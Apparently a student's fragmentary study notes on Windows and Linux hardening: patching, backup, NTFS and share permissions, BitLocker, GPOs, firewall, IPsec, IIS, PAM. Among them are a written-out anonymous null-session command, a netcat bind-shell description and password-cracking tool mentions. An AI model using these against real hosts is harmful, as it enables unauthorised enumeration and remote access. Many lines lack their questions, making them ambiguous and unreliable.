replacing one or more system files == fix single problem ==
fix many issues at once
fix many issues at once

sites::sans,microsoft,securityfocus,packetstormsecurity.nl == easiest way to stay on top of new patches
a web site load active x control into IE to scan system for missing updates == disadv is not automatic
update == scan for missed hotfixes&install it ==

connect in background on scheduled basis, built in win2000 and later == windows/automatic update tab
in win2000sp3 & later (AUT, scheduled) == update uses ISO file
microsoft bundle latest updates and patches in one single iso file
WSUS,2000 or later,free,install updates for different ms products,handle over 10000 pc
old version of WSUS
old version of WSUS
must run on IIS6 or later, client connects via HTTP or HTTPS, uses BITS
download in background and other applications aren't interrupted

imported from Wsus server into GPO
sites :: shavlik.com,bigfix.com,ecora.com,gfi.com,patchlink.com

backup system state (registry, certificate DB, AD database, boot-up files)
built in win xp/2003, backs up locked, encrypted, registry files, restore center vista
can be created using ntbackup.exe

include registry, boot-up files, other files depending on what services are installed, schedule backup to
run locally
backup and restore center in control panel, not by location
to restore files backuped by ntbackup to vista/2008/seven
backup all drives and system state,backup selected file types,
doesn't support: backup all drives and system state
built in 2008/vista/seven and can be installed on xp/2003
copy large files in long folder path, copy EFS files, can mirror folders, can't copy locked files == backup
utility to backup selected files in vista ==
options
2008 and later,optional ,can copy locked files,backup system state,volumes

console snap in,can't backup selected files,like wbadmin,copy locked files == at server 2008and later
allow to copy files that is opened or in locked case
ARCserve,ultrabac,Archive,OmniBack
using dd command, Symantec Ghost tool, create image
create image files, can search image, can be burned to CD/DVD
used to create binary disk images
available on xp and later and not available for windows server2008
created automatically at a variety of times
after installing OS, every 24h, before updates, before new SW, before new driver
registry settings,ini configuration files,some os files ,doesn't restore user data files
include changed data files and older copies of folder "previous version tab"
windows restore include data files and latest changes that can be restored

right click folder>properties>previous versions tab

related to system restore
allow regulation to resources (files-folders-printers-registry keys) == consist of(SID of user domain
AC+SID of domain group                                                                                     module 27
file system for cdrom
no auditing ,no access control ,no fault tolerance
inter process communication across network using SMB,only buffer areas == file system used to
leverage SMB p in interprocess com == acts as RAM with shared folder
maximum size is 16TB,transaction oriented processing
permissions,auditing,encryption,compression,transaction oriented processing
boot from another sys , recover sw on FAT
to ensure that the file system is consistent in case of power failure or blue screen == Transaction
oriented processing uses CHKDSK.exe
by NTFS driver itself not 3rd party, makes file blue in color
used to check file system consistency after power-off
a set of NTFS permissions on a file or a folder, sum total of ACEs
DACL is always enforced no matter from where the file is accessed
individual permission of user, group, computer on object, individual entry in DACL
modify NTFS permissions for win2000/xp/2003
built in 2008/vista, modify ntfs permissions
is an individual permission access control entry
custom individual ACE that doesn't translate into a standard ACE


collection of one or more individual ACE
gray-checked box ace
solid-checked box ace
not mandatory, only the root folder of a drive can have only explicit ACEs




permissions applied to the owners,automatically granted to owner
no longer needed,to provide elevated powers to some user without being admins

grant least permissions to users

can only contain members from the domain where created == contain users of the same jobs,shared
needs
can contain members from any domain in entire forest ,can include user accounts == have users from
different domains
account>global groups>universal groups>local groups<permission == inner grp outer grp
how can a group be created
like an e-mail list
only available in AD native mode
allow sharing of resources files printers
like SMB with enhancement,NetBios is not necessary with it
network places,mapped drives,start menu run,shortcuts
no inheritance,multiple share names with different permissions
are enforced when access is done through SMB
used in sharing
default is full control for every one and this default can't be changed from registry
default permission is read for everyone group
full control,change,read       no inheritance in share permissions
enter full UNC,C$,D$,ADMIN$>c:\windows,permission administrator full control
$Admin allow authenticated users group
two reg keys are set to zero "autosharewks"REG_DWORD "autoshareserver"REG_DWORD
shouldn't be modified

full path to the network share
DB of == configuration setting for all computer hardware,applications…
cmd tool to edit ,view registry
GUI to Edit view registry
yellow folder holding files called values
file-looking objects contain the type:REG_Dword and data which is the set to
service allow remote connection to registry. to disable remote remove this service
REGSVC.exe,service allow remote connection to registry
against local and remote access to registry, share permission, WINREG key
key to control sharing permission of registry, default values see book == used to put share permissions on the
registry
a subkey in winreg defines the registry paths that can be readable paths
provides auditing capabilities
regedit>highlightkey>edit>permissions,use security template or GPO
each object has SACL ,DACL and creator owner
container in active directory contain users,computers.
delegate some authority.. reading data for HR

preserve integrity of OS files, registry, data between applications, previously WIC == enabled by default in
win vista
has label(system,high,medium,low) on each object(folder,registry key,shares)
contain integrity SID for MIC label,list of all user rights


can check,modify your mic label
can check,modify your mic label == tool to restrict read and excute access by lower process

low for temp internet, medium for users, high for admins, services run as system == Low label -->
Internet Explorer == High label --> administrative privileges == Medium Label = default
process can't edit securable object unless the object is the same or less MIC label
by default doesn't restrict read or excute


can show your rights on the system

general capability not tied to any object == rights for user on the whole machine not specific object
(local sec policy-local policy-user rig
manage user rights from command line

only admins by default
can make copy …ignore ntfs permissions

require debug programs right,insert thread into address space of target process


cmd to encrypt and decrypt
is the debugger tool in windows, used only with the debug right

use AES 256-bit > encrypt AES key using public key of certificate > encrypt the private key by password == protects
from linux boot, stolen backups == in NTFS, windows2000 or later, USB, removab

different keys for OS
PFX file encrypted by password
to create a recovery certificate at that path
on vista and later a recovery certificate on smart card, file path for .cer
the private key is in the profiles of local admin
strong password,smart card,syskey,encrypt folders not files
encrypt password hashes for accounts and private keys with 128bit rc4 key derived by passw

to put passphrase at boot up
bestway to use password not to store locally
to wipe files from hard disk, file scrubber, removes plaintext remains


verification of integrity, sector-level encryption
win vista ultimate and enterprise, server2008, not in vista business or win7 professional
for whole drive with paging & hibernate files
contain windowes files c:/windows
two ntfs volumes boot volume,system volume
two drive volumes: boot-up & system
contain files used during the boot process
Boot Sector, Master Boot Record, BOOTMGR, BIOS code
128bit AES or 256 AES,encrypt decrypt the volumes of bitlocker
integrity check using SHA-1

built in motherboard,random number generation,cryptographic operations
enable in BIOS, turn on windows then initialize in windows with owner password


tpm+usb+PIN, TPM+usb, TPM+PIN, TPM only, usb token with no TPM
TPM only
windows management instrumentation, can write scripts for administrative tasks
passwords can be extracted from RAM through dump raw memory
time consuming,full decryption
quick, temporary, doesn't decrypt, key saved in plaintext on disk, good for updating BIOS
4 ways
string of ASCII ,saved to file,used only when managing tpm

48-digit PIN inserted using function keys == FVEK when recovery password lost == BIOS support
function Key to enter PIN or during emergency
push recovery keys to AD and FVEK
ASCII file contains configuration of security settings, snap in                                         module 28
password policies, account lockout policies, kerberos policies, audit policies == ASCII files contain
security settings

.inf file stored by default in /systemroot/security/templates

using notepad or MMC.exe
edit security template

Security Template from Microsoft, NIST, CIS --> debugged and tested == Template from Microsoft,
NIST, CIS --> debugged and tested
EC,for computers joined to active directory 2003 or later
SSLF, maximum security template, sacrifices backward compatibility, peak performance
specialized security limited functionality,, template sec level
federal desktop core configuration
security templates and configuration guides and assessment tools to go with them

used test OS against security tem benchmark

used to configure computer to match security template in one easy step,no undo == is used to import
temp & apply it to PC == SCA limitation --> only on local machine not across network
SCA,can save database file .sdb,can't apply through network

cmd tool for security configuration and analysis SCA
configure computer using the database from floppy
mmc snap in, current PC settings except ntfs and registry key ACLs, applied automatically
mmc snap in, current PC settings except ntfs and registry key ACLs, applied automatically
even when no one log on
applied to current user desktop
can import security template in it ,some setting in template not in the GPO
scripts can be written in any scripting language,interpreter
startup/shutdown run in computer context,logon/logoff run in user context
container for many security settings from registry, restrict control panel, password screen saver
ADM/ADMX templates, ADM any win version, ADMX from vista and later
has templates to configure all office products, word, excel, ..
administrative templates, can be edited using notepad, ADM for any win version,
are stored in active directory database and replicated to all domains == domain group policy-at
startup/shutdown-pc download computer conf. == domain group policy-at login/log off-pc download
user configuration == 90-120 min for any policy change
linked only to particular OU
applied to every one at the top level of domain

GPMC ,download for xp/2003 by default in vista /later ,, used to configure domain GPO in forest
updated to other domains in 15 minutes and workstations update in 90-120 min

max-length:127,minimum password length:15 == password policy&recommended settings(use
passphrase)
prevent users from recycling their old favourite password
duration,lockout threshold:5,account counter lock out:45min
***********3 pages***********
***********2 pages***********
null session vulnerability,not used with xp and later so much
smb session to server where username and password are blank
create null session,
net use \\target\ipc$ "" /user:""
to establish null session
from GPO or registry by setting RestrictAnonymous to 2 === Null user session: SMB session without
username, password

set to 2 to disable null session,system\currentcontrolset\control\lsa
Do not allow anonymous enumeration of SAM accounts and share --> enabled
anonymous access: allow anonymous SID/NAME translation --> disabled
NO access without explicit anonymous login
lan manager authentication level: GPO security option, NTLMv2 not vulnerable to cain + rainbowcrack,
Kerberos uses UDP

software to crack password hashes, NTLMv2 not vulnerable to cain + rainbowcrack
send NTLMv2 response only , refuse NTLMv1


not vulnerable
net user password /active:no /time: ,
disable guest&random pas
simple file sharing winXP: all remote authentication done using guest account
with simple sharing disabled users authenticate as themselves, Classic: local users authenticate as
themselves

admins, domain admins, enterprise admins, schema admins, dns admins, account operators == Built-in
administrator account cannot be locked out == administrator account lockout from over the network ==
limit local account use of blank password to console logon only == administrator account policies
& recommendations
strong pass,smart card authentication,enable lockout for admin account,decoy account

can launch programs under different privileges, program in vista to run programs with other privileges

define exactly what executables can and can't run in winXP or later == who can or can't launch process
or sw ==
4 exceptions: hash of executable, issuer of digital certificate, UNC path of executable, zone
help to fight malware,which process can user run , MD5 - UNC - Zone , SRP exception to allow or deny
by 4 methods , Basic User , Unrestricted , create exception to default policy , Default deny policy ,
Default Allow policy , Disallowed

enforced options,designated file types,trusted publishers options
Global SRP,to exculde admins and maybe dlls from SRP policies
Global SRP,define which file types the SRP policies apply,can add new file types
determine who decide to trust certficates,whether CRL is required
at least one server 2008 -R2 to push GPO of AppLocker , server2008/7 R2-enhanced SRP with new
options , improvement in SRP
how normal users could run SW in higher previ ,, GPOs used to control it,standard&admin users ,, how
to turn it off ,, how it work using users &process mic lables ,, how to run as admin ,, Standard user
process: medium or low MIC label:::SAT stripped of dangerous priv. ,, Administrative user process:
high or system MIC label:::standard SAT for admin group member ,, UAC can be managed or turned off
via group policy
tool to run as adminstarto=RUNAS.exe

IE8 or later launch seprate process Iexplorer.exe
on:when MIC of explorer is low,off:when explorer run by administrator
special folder when running with MIC :low
used by internet explorer to run active x control when MIC is low,same as ieinstall.exe == run by IE in
high previlage"broker process"
used by internet explorer to run active x control when MIC is low,same as ieuser.exe == run by IE in
high previlage"broker process"

99% of IE settings usin GP , few change will block most exploits even without patches but these change
breack func.
check for phishing, malware web sites, check via Microsoft database, automatic, manual
define exceptions to permit dangerous features for URLs that you trust
list URLs for sites that you don't trust
examine the flow of data back and forth between web server and browser, detect XSS
IE8, maintain privacy against attempts to track users via multiple sites
compare URL against list of known phishing sites & malware download URLs




include both known phishing sites & malware download URLs
a hardened machine against vulnerabilities not discovered yet                                  module 29
administrative tools, security template .inf, GPO, sc.exe
disable all the undesired services in one shot
service startup settings
to disable service
disable service
configure each aspect of every service or device driver on a local or remote machine
query list of services from a remote PC
getkeyname to get the registry key for the service
show more detailed extended information about the service specified by registry key
query the configuration information about the service specified by registry key
to stop the service specified by the registry key from getkeyname
start=disabled, to permanently disable the service specified by registry key
from the dependencies tab you can know what services depend on what


in disable service, disable the World Wide Web Publishing service
Server 2003 SP1, can't be installed in Vista/Seven, works in Server 2008
built-in knowledge about services, ports and network components needed for roles or functions
you can select the roles you want & SCW will perform many security reconfiguration tasks for you
you can roll back the last set of changes
can be used to configure a server or to analyze compliance with this policy

cmd tool for the SCW GUI, scriptable version
file.xml is the policy file which will configure a server with which services run, disable, stop
enable/disable services, configure firewall rules, IPsec policies
view the report from SCW using a nice GUI
to see analysis and report options of the tool, /m:machineName, /p:path&policyFile, /o:output
can configure a list of computers but you can't roll back a list, to configure an OU
/p:file.xml /g:grouppolicy file, can take an XML policy file and convert it to a GPO
Server 2008 and later, organizes server capabilities into roles and features, helps with dependencies
cmd tool for Server Manager, scripting enabled
no standard graphic
a path of communication between network component and physical network adapter
a path of communication between network component and physical network adapter
returns the local NetBIOS name table for that computer, name and code
name and code number reveal the service running on the target, registry_key=netbt
the code numbers can be looked up in the following table to reveal what services are running
required for full backward compatibility with older operating systems
NetBIOS not related to null session
query the configuration information about the NetBIOS service
disable NetBIOS service
system default case for NetBIOS

LDAP, default protocol for searching and editing the Active Directory database
cleartext: tcp/389, LDAP SSL encrypted: tcp/636, global catalog: tcp/3268, global catalog encrypted: tcp/3269
tcp/udp/88, tcp/udp/464 for Kerberos change password, tcp/749, tcp/2053
tcp/udp/137
udp/138
tcp/139
Windows Firewall with Advanced Security, ICF Internet Connection Firewall old edition
WFAS, stateful firewall can be managed through group policy and netsh.exe
no support for automatic upload to a central server
public, private, domain network
a trusted network that doesn't have domain controllers
like an airport, most restricted rules
is a categorization label assigned to the network adapter card and the network to which it is attached at the moment. When first connecting you will be prompted to choose
used to access domain controllers for the computer's Active Directory, profile selected automatically when Active Directory is detected
least restricted rules
text file in W3C format, maximum log size is 32 MB
all inbound connections will be blocked even if there is a rule that allows them
how to make a rule: "programs & services, users & computers, protocols & ports, scope"
mutual authentication and packet signing
mutual authentication and encryption
netcat runs and listens on 7890 and connects an incoming session to a new instance of cmd.exe

best rule that matches wins
manage Windows Firewall and network related services, manage IPsec
allprofiles, summary of your profile options (domain-private-public)
rule name=all, dump the details of every rule
rule /?, how to create a rule,
mutual authentication, encryption, packet signing, ipsecpol.exe, ipseccmd.exe, netsh.exe
Windows 2000 resource kit to configure IPsec
Windows XP, download from Microsoft, to configure IPsec
see all IPsec configuration using netsh.exe ipsec dynamic add mmpolicy name=TempMMpolicy

block all packets netsh.exe ---> netsh.exe ipsec dynamic add rule srcaddr=any dstaddr=any ,, allow ICMP packets ...… ,, allow packets to/from TCP port 80 ……… ,, to get rid of the policy & its rules …..
PC will attempt to use IPsec, if not it will fall back to plain text for backward compatibility

PC will not require or request IPsec, but IPsec is enabled, GPO option
secure server (require security), server (request security)
IPsec policy with 3DES mutual authentication, only IPsec is allowed, GPO option
will request mutual authentication but will fall back to plain text if the client doesn't support IPsec
SSL/TLS VPN requires Win 2008 Server, no problems with NAT or firewalls, see book
assists IPsec in tasks such as user authentication and RADIUS policy enforcement
NAT problems especially with more than 1 NATting device
no IPsec, no NAT problem, PPTPv1 vulnerable, use PPTPv2
vulnerable, MS-CHAPv1
use 128-bit RC4 encryption, MS-CHAPv2
built into Windows, VPN tunnel-like interface, supports smart card, logon to desktop via VPN
like any regular interface for VPN connection, desktop logon
for VPN if smart card is required use EAP
multi-protocol router, can do NAT, load balancing, fault tolerant, NLB driver built in
built into RRAS to support load balancing
Routing and Remote Access Service, stateful firewall built into Windows Server but not enabled ,, manage with RRAS snap-in or with netsh.exe
ISA, doesn't have VPN built in
collection of services, can be installed separately or not, including HTTP, FTP
version 7 on Server 2008
is an installation option

it should not be a member of the main internal forest but of a separate forest

includes handling ASP.NET framework & XML configuration files
included in Server 2008 R2, not in Server 2008
to install the Web Server IIS role, run Server Manager to install the components needed by checking the box to select, adding apps like (ASP, ASP.NET, CGI)
install/uninstall roles & features
to see which roles or features are installed right now
System: full control, Administrators: full control, Everyone: read & execute

have separate drive volumes for OS and web content, apply suitable security template from Microsoft or CIS to OS volume, configure NTFS permissions by principle of least privilege
account for anonymous HTTP access to IIS
can host many sites simultaneously in three ways: port, IP, host header
IIS will drop processing the request & return error msg, to create a new site open IIS manager console ,, configure existing website ,,
IIS host header can block it if configured, requires .ida mapping on Win 2000 ,, IIS does not process the request of a script kiddie who only uses IP address, port to connect to the server as they send the wrong host header, like Code Red worm
IIS component that handles processing certain requests, DLL, EXE
compiled from C++ code
.NET type, C#, VB.NET code
when static HTML is requested
when directory listing is generated
DLL executables loaded in the memory address space of the web service itself
requires *.printer mapping on Win 2000
requires *.htr mapping on Win 2000
requires .asp mapping
scripts, cgi, msadc, printers, iishelp, iissamples
protects a machine from the old Rain Forest Puppy RDS exploit on IIS4
on IIS4, can be prevented by removing the msadc folder from IIS
used by Outlook Web Access site for Exchange Server
Outlook Web Access worm can be prevented by removing or renaming the IIS exchange folder
TLS / authentication requirements / IP address restrictions
compatible with all browsers, sends passwords unencrypted, use SSL with it
free application firewall for IIS5/6, scans HTTP requests and rejects bad requests
free application firewall for IIS5/6, scans HTTP requests and rejects bad requests
can be configured through XML files, like urlscan.dll
per-site, per-folder, per-file, by default everything will be logged

NTFS permissions: allow full control System & Admins, deny full control IUSR
cmd HTTP client
manage HTTP, can use SSL
use local time for file naming and rollover
script takes 2 arguments: IIS log file, text file of regular attack patterns, and searches for those

in SQL Server, authentication method using Active Directory and Kerberos
graphical remote control of virtual desktops hidden in RAM of the RDS server
remote administration, application server
Terminal Services on XP/Vista, prevents users with blank passwords from logging on

ActiveX version of Remote Desktop client on Server 2008 R2 and later
Terminal Services and Remote Desktop use RDP on TCP port 3389
Remote Desktop Protocol
low - client compatible - high - FIPS compliant
RC4 is not permitted
in RDP6, authenticates client and server before the session is created in memory, prevents DoS
NLA support, Server 2008 and later built in, download for XP, 2003
performance enhanced, not security
NLA, 128-bit encryption minimum, TLS, smart card, block access to local drives
enhanced management capabilities in RDP client, thin client for Linux, Solaris, Mac
200 questions, makes a report with prioritized action list, perspective of CISO
Microsoft Security Assessment Tool, 200 questions, report
Microsoft Baseline Security Analyzer, patch scanning, scriptable
the gathering and analysis of detailed information about the network                                         module 30
everything can be done with Windows without a mouse
from Windows installation CD cd:\support\tools\suptools.msi, Win 2000, 2003
Vista and later, allows an administrator to sit at a workstation and manage Active Directory
Vista and later, allows an administrator to sit at a workstation and manage Active Directory
documentation, scripts, tools, for :: IIS, SMS, SQL Server, Exchange
wmic.exe <item> list full
get the latest service pack installed on the system
output is 15~30 MB, 5 to 15 min to run
wmic.exe, netsh.exe, getmac.exe, ipconfig.exe, route.exe, net.exe, netstat.exe, nbtstat.exe
troubleshooting tool, 2000, XP, 2003 only, variety of tests and dumps the output to console
run all tests available, show more data
run specific testName and show more data
like Cisco, int to interface, set machine IP allows you to execute commands remotely
allows you to execute netsh commands remotely
retrieve the hardware address of remote computers
can be used to show shared folders, drive mappings, account and group information, services
show all listening ports
variety of IP settings
show routing table
NetBIOS related data
Process Explorer, Autoruns, PsExec, RootkitRevealer, purchased by Microsoft
forensics toolkit, NTLast, Fport, ScanLine
DumpSec, DumpEvt, DumpReg
Active Directory tools
a Task Manager replacement, Sysinternals
allows you to see and edit startup commands at boot, Sysinternals
remote execution of commands, Sysinternals
helps to detect rootkits, Sysinternals
show computer configuration, service packs, patches, software
Afind, Hfind, Sfind, FileStat and Hunt, file system analysis, list of files accessed without modifying, by Foundstone, show hidden files, alternate data streams
helps you scan event logs for things, comma delimited output for easy , Foundstone
print table of TCP/UDP connections and the executables attached to them, Foundstone
command line port scanner, when WinPcap has problems, Foundstone
dump event logs into plain text ASCII, SomarSoft
dump the registry to plain text ASCII, SomarSoft
can dump NTFS permissions and audit things to text file, SomarSoft
tools to force passwords to expire, list groups of a user, unlock user accounts
dozens of VBScripts
interface all scripts use to do things and also wmic.exe
Windows Management Instrumentation, interface for scripts to use
to get scripts
to see your environment variables
cmd replacement, Perl-like, Win Server 2008, 7 by default, available for XP SP2
create COM files, object oriented
graphical management tool wrapper for PowerShell
tool runs within PowerShell, supports piping
pipe symbol |, list local events, show the last 20 events, show only warning & error
domain controllers multi-master replicate scripts to each other using it
startup/shutdown run in computer context, logon/logoff run in user context
causes the script to be downloaded and executed locally
task scheduler, LSA Secrets portion of the registry
by schedule
to ensure changes are made within control parameters as a part of configuration management
any change done by IT department is written here
maintain and check written logs, examine machines with tools

cmd for SCA, steps
free, takes a range of IPs to scan, another dangerous service in SQL, launch MBSA

scan remote hosts for missing hotfixes, analyze data and return it via FTP, mail, SMB
/r for IP address range, /f for redirecting output to file
list all the reports that are available
display a detailed report
collection of data that documents the configuration and running state of a machine
computername_type_date
section with labels, username and domain of who ran the script
user accounts, group membership, shared folders, user rights, processes, network configuration
IIS separate registry, you have to include it in a system snapshot
compute SHA-256 message digests
lockout and password policy
get the current audit policy for all categories
get all the Winsock API info about network configuration
show Windows Firewall settings
list the system drivers
Sysinternals Autoruns
show directory and all subfolders
cmd tool, prints differences between files
GUI of fc.exe, shows differences between files
free third party tool to compare files
like the Linux less command, opens large files but doesn't load the entire file at once
free comparisons between files from Mandiant
application, security, system, directory service for active domain, DNS server, description field
where OS applications and third party tools write
write your own entries to the event log using this command line tool




audit account logon events, audit account management, audit directory access




tool from resource kit, enable or disable audit policies from command line

enable it only and nothing will be logged, enable it then enable SACL for your logs
different for different objects, can be inherited

audit the interesting things, logs, privileged access, changes to admin access
can monitor folder, if exceeded will alert
maximum of 4.2 GB but actually 300 MB
no problem because XML logs can be compressed
three options: overwrite events as needed, overwrite older than x days, don't overwrite




central database for all logs, psloglist.exe, dumpevt.exe
dump the event log into a text file and sort it
MOM server, centralized log, watch servers, extract event logs and audit data
centralized log, watch servers, extract event logs and audit data
KeyWord                                  book  page   Notes
windows and linux                        6     5      over 90% (93.4) use Windows
better os                                6     5      all have advantages, limitations and liabilities, and since they get together they represent risk
cygwin                                   6     7,8    makes Windows Linux-smart or (Linux aware) and allows some Unix software to run directly in Windows (all versions except CE) and you must have access to the source code (can compile)
mac os x                                 6     7,12   UNIX/BSD and software, server also has a server edition, 7% market share, 2nd most popular OS, it is more intuitive for beginning users than Windows and Linux
cygwin isn't linux                       6     8      has some Linux commands and utilities and it isn't a Linux emulator for Windows so it is a "half-way" step to Linux
cygwin uses                              6     8      it can be an entire environment of development tools that have a lot of power (as in developing software for the GNU project) and allows Windows developers to do some neat advanced programming in Windows
cygwin base install                      6     9      gives you a nice but small selection of Linux shells and commands and you can add more programs later (by running setup.exe)
cygwin setup.exe                         6     8
linux vs. cygwin                         6     9      cygwin is not something you can depend on to work consistently
cygwin power                             6     10     adding powerful scripting to Windows (there are some things Windows can't do easily or can't do at all)
mutt                                     6     10
cygwin functionality                     6     11     install the Linux libraries and programs it needs in cygwin to communicate with a service on a native Linux server
cygwin commands                          6     11     such as dig (domain name specific) which is better than nslookup, also can use GNU development tools to write Linux and Windows code, also we can use it as an X server
pre mac OSX                              6     12     not considered high power and not quite ready for serious use, it was used for graphical work and desktop publishing, has a noisy network protocol, it is used for desktop work not server work
apple finder program                     6     12     similar to Windows "Network Neighborhood", in a large network with multiple OSes it makes bandwidth issues
MAC OS password assistant                6     14     grades strength of password: red --> weak, yellow --> password OK, green --> strong password
MAC OS file vault                        6     14     strong encryption of user home dir, it uses 128-bit AES
open ssh                                 6     14     encrypted remote access that replaces telnet and FTP and it is included in Mac by default
IPFW                                     6     14     personal firewall installed and on by default in Mac OS
linus torvalds                           6     16     creator of the Linux kernel (rewrote Minix for the Intel 386 platform), his code represents only 2% of the kernel now
linux importance                         6     17
O_DIRECT                                 6     18     kernel flag in Linux that allows programmers to take advantage of writing directly to the device
ubuntu                                   6     19     Debian Linux, desktop & server, installs in 40 languages, (amd64, i386, ultrasparc, powerpc) supported arch, APT (for package management), no GUI firewall and it isn't configured by default
fedora                                   6     21     Red Hat Linux, desktop & server (chosen by installer), (i386, x86_64, powerpc, alpha, sparc) no amd64, 25 languages, RPM (for package management using yum), firewall included and enabled by default
linux live cd                            6     23     allows you to test drive, no HD required or installed, excellent for forensic work and troubleshooting, also used for rescue and recovery
live Distro                              6     23     as live CD but for any bootable media such as USB, floppy, external HD, iPod
OS overview                              6     25     kernel, shell, hardware
kernel                                   6     25     memory resident part of the OS loaded in memory at boot (manages HW and the executing processes)
shell                                    6     25     the portion of the OS with which users and processes interact directly (it is the command line interpreter & provides the user with an interface to the system)
kernel services                          6     26     file system, low level network protocol support (IP), memory and process management
file system structure                    6     27,28  /bin, /usr/bin, /usr/local, /etc, /dev, /var, /tmp, /home, /mnt, /usr
file system                              6     27     actual location of the information
mount point                              6     27     is where the computer puts the file system so it can access it
absolute path (reference)                6     29     the path specified from the top of the tree to the desired file
shell                                    6     30     listens to the terminal then translates the request into action by the kernel and programs
shell examples                           6     31
linux and DOS corresponding commands     6     32,33
linux file permission                    6     34
chmod                                    6     37
setuid                                   6     38     programs run with owner permission, used with executable files --> perm rwsr-xr-x
setgid                                   6     39     same as setuid but programs run with group perm
setgid for dir                           6     38     when a new file is created in the directory it will inherit the group of the directory --> perm rwxrwsr-x
sticky bit                               6     38     delete only your files, not others' files --> dir perm rwxrwxrwt
extended perm                            6     41,42  setuid, setgid, sticky bit, specified through the fourth number in chmod
chown                                    6     44     change file or dir ownership --> chown username file|dir, chown user:group file|dir
chgrp                                    6     44     change file or dir group --> chgrp groupname file|dir
newgrp                                   6     45     login to a new group (when creating a file its group will be that group) --> newgrp grpname
groupadd                                 6     45     create a new group --> groupadd grpname
groupdel                                 6     45     delete a group --> groupdel grpname
/etc/group                               6     46     system group db --> groupname:group passwd:groupid:group members
                                                     used to assign a passwd to a group gpasswd group -->add passwd to a group gpasswd -a user group -->add user to the group gpasswd -d user group --> to delete the user from
gpasswd                                  6    47
                                                     the group
id command                               6    49     show effictive username and id, user's groups and their id (primary and secondary groups)
/etc/passwd                              6    50     system users db -->username:x:uid,gid:commnet:homedir:login shell
/etc/shadow                              6   51,53   linux and solaris shadow file name & it contains users encrypted passwd and passwd aging -->username:encrypted passwd:lastchg:min:max:warn:expire:inactive:flag
/etc/seurity/passwd                      6    51     AIX shadow file name
/etc/master.passwd                       6    51     free BSD shadow file name
/tcb/files/auth/r/root                   6    51     HP_UX shadow file names
passwd file fields                       6    52     7 fields
shadow file fields                       6    53     username, passwd, last, may, must, warn, expire, disable, reserved
useradd                                  6    54     add user to the system and it update /etc/passwd, /etc/shadow, /etc/groups file
passwd aging                             6    55     by 2 files /etc/login.defs and /etc/default/useradd
/etc/login.defs                          6    55     PASS_MAX_DAYS-->default:99999days, PASS_MIN_DAYS-->default:0days,PASS_MIN_LEN-->default 0(controlled by PAM),PASS_WARN_AGE-->default 7days
/etc/default/useradd                     6    56     INACTIVE,(no. of days after passwd expiration that account is disable) (default -1 mean disable), EXPIRE
account passwd info display              6    57     chage -l <username>
chage -l            (command)            6    57     account passwd info display
PAM (pluggable authentication modules)   6    58     system libraries that handle linux authentiation it is originally invented by SUN
PAM management groups                    6    58     that handle specific types of authentication requests --> Auth, Password, Session, Account
                                                     in /etc/pam.d and comman pam files format type-->pam management group control-->action if pam auth fail module-path module-argument-->specify name and path of the
PAM config files                         6    58
                                                     module in use (within /lib/security) and what action should be passed into it
/etc/pam.d                               6    58     Directory contain all PAM configuration files and named for the services they are control as /etc/pam.d/su
password enfore stronger (Linux)         6    60     /etc/pam.d/system-auth & use this module: pam_cracklib
pam_cracklib                             6    60     pam module check the passwd against dictionary words to make assessment and other constraint in /etc/pam.d/system_auth
                                                     password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) and loking user account after fail login (pam_tally module)configuration
/etc/pam.d/system_auth                   6    60
                                                     file
minlen=$                                 6    60     minimum length of passwd must be $ in/etc/pam.d/system-auth in pam_cracklib argument
lcredit=$                                6    60     minimum no of lowercase letters is $ in/etc/pam.d/system-auth in pam_cracklib argument
ucredit=$                                6    60     minimum no of uppercase letter is $ in/etc/pam.d/system-auth in pam_cracklib argument
dcredit=$                                6    60     minimum no of digits is $ in/etc/pam.d/system_auth in pam_cracklib argument
ocredit=$                                6    60     min no. of other character is $ in/etc/pam.d/system-auth in pam_cracklib argument
pam_unix                                 6    61     remember old passwd module to restrict use of previous passwd also in /etc/pam.d/sustem-auth
restrict use of previous passwords       6    61     password enforcing (pam_cracklib argument) and restricting use of previous passwd (pam_unix argument) & create /etc/security/opasswd
difok=$                                  6    61     no of character must be diff from old passwd in/etc/pam.d/system-auth in pam_cracklib argument
remember=$                               6    61     this value is the no of old passwd remembered in/etc/pam.d/system-auth in pam_unix argument
/etc/security/opasswd                    6    61     if doesn't exit create it @ restriction use of previous password
pam_tally                                6    62     /etc/pam.d/system-auth it is pam module used to count fail logins
locking useraccount after fail logins    6    62     in /etc/pam.d/system-auth in pam_tally module
No_magic_root                            6    62     in /etc/pam.d/system-auth in pam_tally module tells the system not to lock the root account to prevent DoS against the root account
onerr=fail                               6    62     in /etc/pam.d/system-auth in pam_tally module tell the system what to do when reaching a set no of fail=lock account
per_user                                 6    62     in /etc/pam.d/system-auth in pam_tally module keeps account of each individual use
Deny=$                                   6    62     in /etc/pam.d/system-auth in pam_tally module and it equal the number made before account lock
unlock account (Linux)                   6    62
faillog -u <username>                    6    62     list current no of bad logins with -r with unlock the account, with -m -l will turn off locking on lock out of specific user
faillog -u <username> -r                 6    62     will unlock the account
faillog -u <username> -m -l              6    62     will turn off locking on the lock out of particular user
passwd -l                                6    62     lock account
passwd -u                                6    62     unlock account
usermod -U                               6    62     unlock account
usermod -L                               6    62     lock account
commands to find a compromised system    6    63     ps , netstat , dd
ps (process status)                      6   64,65   ps command and it is detection control
%CPU                                     6    65     ps output and it is percentage of cpu process is using
%MEM                                     6    65     ps output and it is percent of memory process is used
VSZ                                      6    65     ps output and it is process size
STAT                                     6    65     ps output and it is current process status
TIME                                     6    65     ps output and it is tilme the process start running
netstat                              6     67     summerize tcp/ip network traffic, -a --> all the service or ports acive, -n --> display in numeric format ( show IPs)
dd                                   6     68     backup command dd if=<Input-file> of=<output-file> , and it is offer no security prevention
dd                                   6     68     backup (bit-by-bit image), reduce backup time, can be conducted through: Locally, Via Scripts, Over the Network
service started how?                 6     73     1-at boot time, 2-automatic by init or rc scripts which use inetd/xinetd(on demand services), 3- cron scheduler (crontab), 4-command line
init process                         6     74     after kernel loading it is a program provide layer between kernel and user, is starts when the compouter boots and continues till the system shutdown.
init styles                          6     74     sysV (as in debian/ubuntu and redhat/fedora), and BSD (as in free BSD and other BSD distributions)
/etc/inittab                         6     74     lists each of the init processes the system should start at boot and stop at shutdown; has 4 fields id:runlevel:action:full path of the binary
getty service                        6     74     allow users to begin logging into the system
inetd                                6     76     super server daemon responsible for starting network services when there is a request (not at boot as init) service must be listed in 2 files (/etc/inetd.conf,/etc/services)
/etc/inetd.conf                      6     76     config. file for inetd; connects names of services to names of servers, e.g. tcp with /usr/sbin/tcpd in.telnetd
